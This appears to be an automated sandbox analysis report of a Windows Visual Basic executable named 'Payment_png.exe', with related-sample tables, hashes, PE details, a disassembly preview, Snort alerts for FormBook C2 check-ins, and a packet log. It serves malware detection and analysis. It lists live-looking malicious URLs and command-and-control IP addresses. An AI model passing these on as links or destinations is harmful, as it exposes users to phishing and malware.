NAMECHEAP-NETUS	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PackedNET.576.11555.exe	Get hash	malicious	Browse	198.54.122.60
	salescontractv2draft.exe	Get hash	malicious	Browse	198.54.117.210
	InYqh5AcS6.exe	Get hash	malicious	Browse	198.54.122.60
	Yvmkw23Is5.exe	Get hash	malicious	Browse	198.54.122.60
	tl7WJoaDUI.exe	Get hash	malicious	Browse	198.54.122.60
	EiSPsgvb9L.exe	Get hash	malicious	Browse	198.54.122.60
	IFC97cyhGG.exe	Get hash	malicious	Browse	198.54.122.60
	rErRI1Ktbf.exe	Get hash	malicious	Browse	198.54.117.210
	nXbr39i8id.exe	Get hash	malicious	Browse	198.54.122.60
	KCPWdXq731.exe	Get hash	malicious	Browse	198.54.122.60
	iDWyvado4K.exe	Get hash	malicious	Browse	198.54.122.60
	fdIR3c9MMf.exe	Get hash	malicious	Browse	198.54.122.60
	50729032021.xlsx	Get hash	malicious	Browse	198.54.117.197
	Drawing Pipe Spools Ducts.doc	Get hash	malicious	Browse	198.54.122.60
	OUTSTANDING INVOICE.doc	Get hash	malicious	Browse	198.54.122.60
	9tRIEZUd1j.exe	Get hash	malicious	Browse	198.54.117.218
	Gt8AN6GiOD.exe	Get hash	malicious	Browse	198.54.117.197
	ACH25083.htm	Get hash	malicious	Browse	104.219.248.71
	2pA9qt1vU4.exe	Get hash	malicious	Browse	198.54.117.215
ONEANDONE-ASBrauerstrasse48DE	rErRI1Ktbf.exe	Get hash	malicious	Browse	217.160.0.41
	TaTYytHaBk.exe	Get hash	malicious	Browse	82.223.14.245
	messg_02620000_deupx - Copy.exe	Get hash	malicious	Browse	217.160.40.194
	2pA9qt1vU4.exe	Get hash	malicious	Browse	213.171.195.105
	aEdlObiYav.exe	Get hash	malicious	Browse	87.106.136.232
	2670890000.exe	Get hash	malicious	Browse	74.208.5.2
	4090850000.exe	Get hash	malicious	Browse	74.208.5.2
	orders.exe	Get hash	malicious	Browse	74.208.236.169
	#0019.vbs	Get hash	malicious	Browse	198.251.72.110
	rona.exe	Get hash	malicious	Browse	217.76.128.34
	New order PO-15547.exe	Get hash	malicious	Browse	217.160.0.241
	RFx 6300306423.doc	Get hash	malicious	Browse	217.160.0.41
	Geldtransferbeleg.exe	Get hash	malicious	Browse	212.227.15.158
	SecuriteInfo.com.Mal.Generic-S.29648.exe	Get hash	malicious	Browse	74.208.5.2
	Order 100955-21042021.exe	Get hash	malicious	Browse	74.208.5.15
	R ALHTQ19-P0401-940 GR2P5 TYPBLDG-NASE FERDAN Q0539 NE-Q22.exe	Get hash	malicious	Browse	212.227.17.174
	ORDER 100955-21042021.exe	Get hash	malicious	Browse	74.208.5.15
	Purchase Order 2021 - 00041.exe	Get hash	malicious	Browse	217.160.0.241
	image0694.exe	Get hash	malicious	Browse	213.165.67.118
	h8lD4SWL35.exe	Get hash	malicious	Browse	217.160.0.69
PRIVATESYSTEMSUS	R8WWx5t2RE.dll	Get hash	malicious	Browse	108.160.158.123
	P.O 5282.exe	Get hash	malicious	Browse	170.249.209.250
	documentation (64).xls	Get hash	malicious	Browse	67.222.24.174
	documentation (64).xls	Get hash	malicious	Browse	67.222.24.174
	Statement for T10495.jar	Get hash	malicious	Browse	207.7.94.54
	Statement for T10495 - 18-01-21 15-23.jar	Get hash	malicious	Browse	207.7.94.54
	Revise Order.exe	Get hash	malicious	Browse	162.248.50.97
	PO21010699XYJ.exe	Get hash	malicious	Browse	162.248.50.97
	cmtel-pdf.html	Get hash	malicious	Browse	204.197.244.149
	cmtel-pdf.html	Get hash	malicious	Browse	204.197.244.149
	SecuriteInfo.com.Trojan.PWS.Stealer.29660.11031.exe	Get hash	malicious	Browse	162.211.86.20
	https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184	Get hash	malicious	Browse	199.167.203.145
	SecuriteInfo.com.Trojan.PackedNET.405.30542.exe	Get hash	malicious	Browse	162.211.86.20
	4ADvH4Xsmh.exe	Get hash	malicious	Browse	162.246.57.153
	https://www.casalfarneto.it/wp-content/siteguarding_logs/www.html	Get hash	malicious	Browse	104.193.111.209
	RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe	Get hash	malicious	Browse	158.106.136.41
	justificante de la transfer.exe	Get hash	malicious	Browse	162.246.57.153
	wwKE1R7ley.doc	Get hash	malicious	Browse	162.255.160.32
	https://bingotips.androidphones.co.uk	Get hash	malicious	Browse	67.222.12.234
	Documentation-906738957.doc	Get hash	malicious	Browse	170.249.199.66
BIZLAND-SDUS	salescontractv2draft.exe	Get hash	malicious	Browse	66.96.162.149
	orders.exe	Get hash	malicious	Browse	65.254.248.81
	Order-PO-0186500.exe	Get hash	malicious	Browse	207.148.248.143
	shippingdoc_pdf.exe	Get hash	malicious	Browse	66.96.162.148
	FYI AWB Shipping documents 7765877546 PDF.exe	Get hash	malicious	Browse	66.96.134.26
	70f0bEUdPO.exe	Get hash	malicious	Browse	66.96.162.148
	PO_210316.exe.exe	Get hash	malicious	Browse	66.96.162.131
	Shipping Doc.exe	Get hash	malicious	Browse	66.96.160.139
	INVOICE-OVERDUE.jpg.exe	Get hash	malicious	Browse	66.96.162.140
	purchase order#034.exe	Get hash	malicious	Browse	66.96.162.149
	xYSbLjGo7S.rtf	Get hash	malicious	Browse	66.96.160.130
	Done.exe	Get hash	malicious	Browse	66.96.162.148
	Scan 392021 pdf.exe	Get hash	malicious	Browse	66.96.160.141
	N6Ej6HEuQt.exe	Get hash	malicious	Browse	66.96.162.133
	REF334.exe	Get hash	malicious	Browse	66.96.131.46
	RAQ11986.exe	Get hash	malicious	Browse	66.96.162.141
	RQP_10378065.exe	Get hash	malicious	Browse	66.96.162.149
	cVMEVF5BE4.xls	Get hash	malicious	Browse	65.254.248.143
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse	66.96.146.102
	IMG_7189012.exe	Get hash	malicious	Browse	66.96.162.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Ypp2jYNpAI.exe	Get hash	malicious	Browse	170.249.199.106
	5zc9vbGBo3.exe	Get hash	malicious	Browse	170.249.199.106
	InnAcjnAmG.exe	Get hash	malicious	Browse	170.249.199.106
	VM-(#Ud83d#Udcde)-- 19795.htm	Get hash	malicious	Browse	170.249.199.106
	2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docm	Get hash	malicious	Browse	170.249.199.106
	DP5kUHHaWs.exe	Get hash	malicious	Browse	170.249.199.106
	Zc0HsqUzyy.exe	Get hash	malicious	Browse	170.249.199.106
	8X93Tzvd7V.exe	Get hash	malicious	Browse	170.249.199.106
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	170.249.199.106
	S8rV8MfxCd.exe	Get hash	malicious	Browse	170.249.199.106
	kHq2ComWy7.exe	Get hash	malicious	Browse	170.249.199.106
	swift-12688.exe	Get hash	malicious	Browse	170.249.199.106
	fKoJx7Ilkj.exe	Get hash	malicious	Browse	170.249.199.106
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	170.249.199.106
	Y55jFKmHpT.exe	Get hash	malicious	Browse	170.249.199.106
	IBKT5GSRU1.exe	Get hash	malicious	Browse	170.249.199.106
	0bcd04549f88ae97a142a6c8c34f46527b88ab15fc1fb.exe	Get hash	malicious	Browse	170.249.199.106
	1k2RZQrqkh.exe	Get hash	malicious	Browse	170.249.199.106
	rwwxCIU6Kk.exe	Get hash	malicious	Browse	170.249.199.106
	fXXC1Q2nRt.exe	Get hash	malicious	Browse	170.249.199.106

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.377414770988995
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment_png.exe
File size:	98304
MD5:	86fa26e33879d3c04152301eaaaba518
SHA1:	3c75755b8efe897bb18ea99f6014dabd5492d32c
SHA256:	eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
SHA512:	29e5f47bcee495a43b7e97383080f965e18eb7eda93b69fbd06e65fd6b1e47f3b9e898b4574e41818aed4b0014961cdd2741d75a5b34ffd51dbad06c23f44ab5
SSDEEP:	1536:nle5CD3/URwKGIOzE7YUzlDX0UEeQpe5:lBrURwUOzQYk5ZQp
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....PW.................@...@......x........P....@................

File Icon


Icon Hash:	11d0cca988e43480

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5750A3D1 [Thu Jun 2 21:23:29 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a8b86b6cb5a304f5649372dc4fc7de67

Entrypoint Preview

Instruction
push 00402B68h
call 00007FEA74E5A533h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+531D74E3h], al
mov byte ptr [ebp+4Eh], ch
scasb
fistp word ptr [edx-0FD75C92h]
retf
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
arpl word ptr [edx], bx
add edx, dword ptr [eax+61h]
insb
jnc 00007FEA74E5A5BBh
imul ebp, dword ptr [esi+67h], 00410800h
and byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or esi, dword ptr [edx+67663E8Bh]
psadbw mm0, qword ptr [edi-4Eh]
stosb
aam DAh
fld tbyte ptr [edi+ebp*2-38C0617Ch]
mov ch, 43h
mov al, byte ptr [B594427Ch]
adc dword ptr [ebp+0F563441h], 3Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb eax, 65000017h
adc eax, 0E000000h
add byte ptr [ebx+75h], dh
bound esp, dword ptr [ecx+73h]
jnc 00007FEA74E5A5B1h
arpl word ptr [ecx+61h], bp
je 00007FEA74E5A5ABh
jbe 00007FEA74E5A5A7h
add byte ptr [66000701h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14204	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x1974	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x128	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13790	0x14000	False	0.309924316406	data	5.74216036023	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x11b4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x1974	0x2000	False	0.513793945312	data	4.5489451124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x180cc	0x8a8	data
RT_ICON	0x17a04	0x6c8	data
RT_ICON	0x1749c	0x568	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1746c	0x30	data
RT_VERSION	0x17150	0x31c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Copyright Singapore
InternalName	tempelhallerne
FileVersion	3.01
CompanyName	Singapore Lin
LegalTrademarks	Copyright Singapore
ProductName	Farmor2
ProductVersion	3.01
FileDescription	Singapore Lin
OriginalFilename	tempelhallerne.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/29/21-13:59:15.924201	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.3	34.102.136.180
03/29/21-13:59:15.924201	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.3	34.102.136.180
03/29/21-13:59:15.924201	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.3	34.102.136.180
03/29/21-13:59:16.123062	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49734	34.102.136.180	192.168.2.3
03/29/21-13:59:32.253784	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	172.67.184.37
03/29/21-13:59:32.253784	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	172.67.184.37
03/29/21-13:59:32.253784	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	172.67.184.37
03/29/21-13:59:37.759049	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	35.246.6.109
03/29/21-13:59:37.759049	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	35.246.6.109
03/29/21-13:59:37.759049	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	35.246.6.109
03/29/21-13:59:42.981524	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	217.160.0.233
03/29/21-13:59:42.981524	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	217.160.0.233
03/29/21-13:59:42.981524	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	217.160.0.233
03/29/21-13:59:53.620903	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	23.227.38.32
03/29/21-13:59:53.620903	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	23.227.38.32
03/29/21-13:59:53.620903	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.3	23.227.38.32
03/29/21-13:59:53.792627	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49742	23.227.38.32	192.168.2.3
03/29/21-14:00:09.372027	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49743	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2021 13:58:28.539237976 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:28.674309969 CEST	80	49712	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:28.674395084 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:28.675035000 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:28.809909105 CEST	80	49712	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:28.811625957 CEST	80	49712	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:28.811692953 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:28.993220091 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.129069090 CEST	80	49713	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.130745888 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.131409883 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.268816948 CEST	80	49713	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.270570040 CEST	80	49713	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.270664930 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.277507067 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.412364006 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.414856911 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.435201883 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.570220947 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.570487022 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.570508957 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.570549965 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.570565939 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.570672989 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.570724964 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.570738077 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.576385975 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.576472044 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.681586027 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.821729898 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.822938919 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.838079929 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.985810041 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985831022 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985848904 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985866070 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985881090 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985894918 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985913038 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985928059 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985937119 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.985939980 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985959053 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:29.985985994 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.985992908 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.985999107 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.986002922 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:29.986120939 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121068954 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121112108 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121124029 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121136904 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121149063 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121160030 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121244907 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121305943 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121356010 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121362925 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121423960 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121444941 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121460915 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121490002 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121512890 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121520996 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121706963 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121766090 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121871948 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121890068 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121903896 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.121933937 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.121957064 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.122147083 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122204065 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.122302055 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122318029 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122333050 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122359037 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.122376919 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.122622967 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122641087 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.122679949 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.122704029 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256247997 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256272078 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256283998 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256298065 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256309986 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256339073 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256453037 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256511927 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256527901 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256570101 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256577015 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256581068 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256609917 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256653070 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256666899 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256709099 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256777048 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256813049 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.256836891 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.256858110 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257004976 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257021904 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257040977 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257057905 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257066011 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257086992 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257103920 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257127047 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257178068 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257184982 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257230997 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257359982 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257376909 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257422924 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257440090 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257575035 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257625103 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257635117 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257641077 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257658005 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257678986 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257694960 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257719040 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257801056 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257817030 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.257860899 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.257879019 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258006096 CEST	443	49714	170.249.199.106	192.168.2.3
